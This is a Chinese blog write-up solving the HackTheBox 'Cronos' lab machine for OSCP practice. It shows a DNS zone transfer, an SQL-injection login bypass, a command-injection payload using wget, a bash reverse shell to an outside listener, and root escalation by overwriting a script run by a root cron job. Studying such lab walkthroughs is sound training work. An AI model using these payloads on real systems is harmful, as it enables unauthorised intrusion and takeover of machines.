oscp——HTB——Cronos

0x00 前言

在这里插入图片描述

0x01 信息收集

在这里插入图片描述

0x02 Web——Webshell

这里开放了80端口,发现80端口没啥东西,扫目录也没扫出来啥。
在这里插入图片描述
看到开放了53端口,知道是开启了dns服务
使用nslookup

nslookup
server 10.10.10.13
10.10.10.13

这类可以看到10.10.10.13的相对应的域名
在这里插入图片描述

查看一下其他的域名

dig axfr cronos.htb @10.10.10.13

这里可以看到还有其他的域
在这里插入图片描述
测试admin.cronos.htb,发现这里是一个登录框
在这里插入图片描述
这里直接使用完成密码进行登录

' or 1=1 #

在这里插入图片描述
使用下面命令进行测试

8.8.8.8;wget http://10.10.14.2:8000

确实是存在命令执行的
在这里插入图片描述
这里可以修改cmd进行执行命令
在这里插入图片描述
反弹一个shell回来

bash+-c+'bash+-i+>&+/dev/tcp/10.10.14.2/1234+0>&1'&

在这里插入图片描述
拿到userflag
在这里插入图片描述

0x03 Webshell——Rootshell

这里我使用的是LinEnum.sh,检测到有Crontab在执行在这里插入图片描述

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

这里看一下这个文件,是一个php的脚本
在这里插入图片描述
这里直接覆盖anacron
在这里插入图片描述
nc 监听,等就可以了,以及来了,这次非常的快
在这里插入图片描述
拿到flag
在这里插入图片描述

相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页